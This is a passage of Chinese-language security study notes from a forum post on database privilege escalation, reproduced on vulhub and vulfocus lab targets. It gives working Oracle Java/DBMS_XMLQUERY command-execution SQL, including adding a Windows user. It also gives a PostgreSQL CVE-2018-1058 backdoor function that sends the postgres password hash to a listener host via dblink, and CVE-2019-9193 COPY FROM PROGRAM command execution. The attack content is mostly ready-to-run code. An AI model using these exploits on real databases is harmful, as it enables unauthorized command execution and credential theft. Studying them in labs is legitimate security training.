        1. select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<all>'''',''''EXECUTE'''');end;''commit;end;') from dual;

      3. 创建执行命令函数

        1.  select dbms_xmlquery.newcontext('declar
 e PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;

      4. 执行命令 select LinxRUNCMD('whoami') from dual;

  3. 通过注入存储过程提权(低权限提升至 DBA)

    1. 原理
      1. SYS 创建的存储过程存在 sql 注入。拥有 create procedure 权限的用户通过创建提权函数,将提权函数注入到存储过程中,于是该存储过程将调用这个提权函数来执行 grant dba to quan 命令,获得 Oracle 数据库 dba 权限
    2. 利用条件
      1. SYS 创建的存储过程 存在sql注入(EG:CVE-2005-4832)
      2. 用户拥有 create procedure 权限(用来创建函数)
    3. 复现

      1. 创建一个 java class 然后用 procedure 包装进行调用

        1.  create or replace and resolve java source named JAVACMD as

     import java.lang.*;

     import java.io.*;

     public class JAVACMD

     {

        public static void execmd(String command) throws IOException

        {

                Runtime.getRuntime().exec(command);

        }

    }

    /

      2. 创建调用的包

        1.  create or replace procedure MYJAVACMD(command in varchar) as language java



     name 'JAVACMD.execmd(java.lang.String)';

 /

      3. 执行命令

        1.  EXEC MYJAVACMD('net user cong cong /add');

      4. image

PostgreSQl 提权

  1. 介绍

    1. PostgreSQL 是一款关系型数据库。其 9.3 到 10 版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。

  2. 复现

    1. 创建函数提权

      1. 介绍

        1. PostgreSQL 是一款关系型数据库。其 9.3 到 10 版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作

      2. 靶场:vulhub postgres/CVE-2018-1058

      3. 用普通用户连接数据库,psql --host 192.168.72.130 --username vulhub(vulhub/vulhub)

      4. 执行以下语句即可(注意更换监听 ip 与端口)

        1.  CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
     select dblink_connect((select 'hostaddr=192.168.1.7 port=1234 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
     SELECT pg_catalog.array_to_string($1,$2);
 $$ LANGUAGE SQL VOLATILE;

      5. 监听端口 nc -lvvp 1234

      6. 模仿超级管理员使用 ps_dump 命令:docker_compose exec postgres pg_dump -U postgres -f evil.bak vulhub,后门被触发

        1. image
    2. 高权限提权
      1. 介绍
        1. PostgreSQL 是一个功能强大对象关系数据库管理系统(ORDBMS)。由于 9.3 增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及 pg_read_server_files 组中的任何用户执行操作系统命令
      2. 影响版本
        1. 9.3-11.2
      3. 复现

        1. 靶场:vulfocus postgresql 命令执行 (cve-2019-9193)123.58.224.8:31404 31404:5432

        2. 连接 postgres/postgres 数据库

        3. 删除一个可能存在的函数 DROP TABLE IF EXISTS cmd_exec

          1. image

        4. 创建执行命令 CREATE TABLE cmd_exec(cmd_output text);

          1. image

        5. 执行系统命令 COPY cmd_exec FROM PROGRAM 'whoami'

          1. image

        6. 将结果显示出来 SELECT * FROM cmd_exec

          1. image

  • CongSec

    本标签主要用于分享网络空间安全专业的学习笔记

    6 引用 • 1 回帖 • 1 关注
香港 位置
1 1

相关帖子

回帖
数据库提权

欢迎来到这里!

我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。

注册 关于
请输入回帖内容 ...
CongSec
没事别关注我, 因为发帖需要更多积分 香港
回帖
51
 帖子
30
 积分
617

近期热议

推荐标签 标签

  • InfluxDB

    InfluxDB 是一个开源的没有外部依赖的时间序列数据库。适用于记录度量,事件及实时分析。

    2 引用 • 66 关注
  • 域名

    域名(Domain Name),简称域名、网域,是由一串用点分隔的名字组成的 Internet 上某一台计算机或计算机组的名称,用于在数据传输时标识计算机的电子方位(有时也指地理位置)。

    43 引用 • 208 回帖 • 1 关注
  • 开源中国

    开源中国是目前中国最大的开源技术社区。传播开源的理念,推广开源项目,为 IT 开发者提供了一个发现、使用、并交流开源技术的平台。目前开源中国社区已收录超过两万款开源软件。

    7 引用 • 86 回帖 • 1 关注
  • BookxNote

    BookxNote 是一款全新的电子书学习工具,助力您的学习与思考,让您的大脑更高效的记忆。

    笔记整理交给我,一心只读圣贤书。

    1 引用 • 1 回帖
  • 黑曜石

    黑曜石是一款强大的知识库工具,支持本地 Markdown 文件编辑,支持双向链接和关系图。

    A second brain, for you, forever.

    11 引用 • 90 回帖
  • Q&A

    提问之前请先看《提问的智慧》,好的问题比好的答案更有价值。

    7464 引用 • 33938 回帖 • 197 关注
  • WebSocket

    WebSocket 是 HTML5 中定义的一种新协议,它实现了浏览器与服务器之间的全双工通信(full-duplex)。

    48 引用 • 206 回帖 • 368 关注
  • SQLite

    SQLite 是一个进程内的库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。SQLite 是全世界使用最为广泛的数据库引擎。

    5 引用 • 7 回帖 • 2 关注
  • 安全

    安全永远都不是一个小问题。

    200 引用 • 815 回帖
  • danl
    101 关注
  • Java

    Java 是一种可以撰写跨平台应用软件的面向对象的程序设计语言,是由 Sun Microsystems 公司于 1995 年 5 月推出的。Java 技术具有卓越的通用性、高效性、平台移植性和安全性。

    3170 引用 • 8209 回帖
  • FreeMarker

    FreeMarker 是一款好用且功能强大的 Java 模版引擎。

    23 引用 • 20 回帖 • 447 关注
  • 学习

    “梦想从学习开始,事业从实践起步” —— 习近平

    164 引用 • 492 回帖
  • Notion

    Notion - The all-in-one workspace for your notes, tasks, wikis, and databases.

    5 引用 • 26 回帖
  • 架构

    我们平时所说的“架构”主要是指软件架构,这是有关软件整体结构与组件的抽象描述,用于指导软件系统各个方面的设计。另外还有“业务架构”、“网络架构”、“硬件架构”等细分领域。

    142 引用 • 442 回帖 • 1 关注
  • 大数据

    大数据(big data)是指无法在一定时间范围内用常规软件工具进行捕捉、管理和处理的数据集合,是需要新处理模式才能具有更强的决策力、洞察发现力和流程优化能力的海量、高增长率和多样化的信息资产。

    93 引用 • 113 回帖
  • WebComponents

    Web Components 是 W3C 定义的标准,它给了前端开发者扩展浏览器标签的能力,可以方便地定制可复用组件,更好的进行模块化开发,解放了前端开发者的生产力。

    1 引用 • 1 关注
  • 小薇

    小薇是一个用 Java 写的 QQ 聊天机器人 Web 服务,可以用于社群互动。

    由于 Smart QQ 从 2019 年 1 月 1 日起停止服务,所以该项目也已经停止维护了!

    34 引用 • 467 回帖 • 725 关注
  • 爬虫

    网络爬虫(Spider、Crawler),是一种按照一定的规则,自动地抓取万维网信息的程序。

    106 引用 • 275 回帖

  • 一些有用的避坑指南。

    69 引用 • 93 回帖
  • Ubuntu

    Ubuntu(友帮拓、优般图、乌班图)是一个以桌面应用为主的 Linux 操作系统,其名称来自非洲南部祖鲁语或豪萨语的“ubuntu”一词,意思是“人性”、“我的存在是因为大家的存在”,是非洲传统的一种价值观,类似华人社会的“仁爱”思想。Ubuntu 的目标在于为一般用户提供一个最新的、同时又相当稳定的主要由自由软件构建而成的操作系统。

    123 引用 • 168 回帖
  • PWA

    PWA(Progressive Web App)是 Google 在 2015 年提出、2016 年 6 月开始推广的项目。它结合了一系列现代 Web 技术,在网页应用中实现和原生应用相近的用户体验。

    14 引用 • 69 回帖 • 136 关注
  • MyBatis

    MyBatis 本是 Apache 软件基金会 的一个开源项目 iBatis,2010 年这个项目由 Apache 软件基金会迁移到了 google code,并且改名为 MyBatis ,2013 年 11 月再次迁移到了 GitHub。

    170 引用 • 414 回帖 • 393 关注
  • Oracle

    Oracle(甲骨文)公司,全称甲骨文股份有限公司(甲骨文软件系统有限公司),是全球最大的企业级软件公司,总部位于美国加利福尼亚州的红木滩。1989 年正式进入中国市场。2013 年,甲骨文已超越 IBM,成为继 Microsoft 后全球第二大软件公司。

    104 引用 • 126 回帖 • 427 关注
  • 尊园地产

    昆明尊园房地产经纪有限公司,即:Kunming Zunyuan Property Agency Company Limited(简称“尊园地产”)于 2007 年 6 月开始筹备,2007 年 8 月 18 日正式成立,注册资本 200 万元,公司性质为股份经纪有限公司,主营业务为:代租、代售、代办产权过户、办理银行按揭、担保、抵押、评估等。

    1 引用 • 22 回帖 • 730 关注
  • OnlyOffice
    4 引用 • 5 关注
  • 房星科技

    房星网,我们不和没有钱的程序员谈理想,我们要让程序员又有理想又有钱。我们有雄厚的房地产行业线下资源,遍布昆明全城的 100 家门店、四千地产经纪人是我们坚实的后盾。

    6 引用 • 141 回帖 • 570 关注

最新标签